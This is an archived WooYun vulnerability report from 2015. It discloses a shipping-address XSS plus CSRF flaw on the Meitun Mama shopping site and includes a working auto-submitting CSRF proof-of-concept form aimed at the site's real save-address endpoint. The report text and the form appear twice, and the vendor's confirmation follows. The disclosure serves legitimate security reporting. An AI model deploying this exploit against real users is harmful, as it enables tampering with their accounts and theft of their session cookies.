当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113851

漏洞标题:美囤妈妈xss+csrf获取其他用户信息

相关厂商:美囤妈妈

漏洞作者: milan

提交时间:2015-05-13 10:59

修复时间:2015-06-27 12:34

公开时间:2015-06-27 12:34

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-13: 细节已通知厂商并且等待厂商处理中
2015-05-13: 厂商已经确认,细节仅向厂商公开
2015-05-23: 细节向核心白帽子及相关领域专家公开
2015-06-02: 细节向普通白帽子公开
2015-06-12: 细节向实习白帽子公开
2015-06-27: 细节向公众公开

简要描述:

求奖品啊

详细说明:

美囤妈妈收货地址存在xsrf,收货地址可以可以xss,但是输入了xss无法提交订单,估计可以绕过去,但是没有详细的去看。利用其实也挺简单,在社区发个链接,当用户执行我的csrf时,csrf中地址带有xss,就获取到了其他用户的cookie。
收货地址存在xss

1.png


收货地址同时存在csrf,收货地址是带有一个用户id的,把这用户id删了即可。poc如下

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GB2312">
<title>酒仙网CSRF POC</title>
</head>
<body>
<form method="POST" name="form0" action="http://salesorder.meitun.com:80/consignee/saveConsignee">
<input type="hidden" name="name" value="123123"/>
<input type="hidden" name="provinceId" value="665"/>
<input type="hidden" name="cityId" value="666"/>
<input type="hidden" name="countyId" value="674"/>
<input type="hidden" name="streetId" value="676"/>
<input type="hidden" name="addressId" value="676"/>
<input type="hidden" name="address" value="张是哪张是哪张是哪"/>
<input type="hidden" name="mobile" value="15512341234"/>
<input type="hidden" name="isDefault" value="true"/>
<input type="hidden" name="province" value="天津"/>
<input type="hidden" name="city" value="市辖区"/>
<input type="hidden" name="county" value="河东区"/>
<input type="hidden" name="street" value="大直沽街道"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

漏洞证明:

美囤妈妈收货地址存在xsrf,收货地址可以可以xss,但是输入了xss无法提交订单,估计可以绕过去,但是没有详细的去看。利用其实也挺简单,在社区发个链接,当用户执行我的csrf时,csrf中地址带有xss,就获取到了其他用户的cookie。
收货地址存在xss

1.png


收货地址同时存在csrf,收货地址是带有一个用户id的,把这用户id删了即可。poc如下

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GB2312">
<title>酒仙网CSRF POC</title>
</head>
<body>
<form method="POST" name="form0" action="http://salesorder.meitun.com:80/consignee/saveConsignee">
<input type="hidden" name="name" value="123123"/>
<input type="hidden" name="provinceId" value="665"/>
<input type="hidden" name="cityId" value="666"/>
<input type="hidden" name="countyId" value="674"/>
<input type="hidden" name="streetId" value="676"/>
<input type="hidden" name="addressId" value="676"/>
<input type="hidden" name="address" value="张是哪张是哪张是哪"/>
<input type="hidden" name="mobile" value="15512341234"/>
<input type="hidden" name="isDefault" value="true"/>
<input type="hidden" name="province" value="天津"/>
<input type="hidden" name="city" value="市辖区"/>
<input type="hidden" name="county" value="河东区"/>
<input type="hidden" name="street" value="大直沽街道"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

修复方案:

你们最专业

版权声明:转载请注明来源 milan@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-13 12:32

厂商回复:

已知漏洞,我们之前的修复方案不太完善。还是感谢洞主,欢迎继续关注!

最新状态:

暂无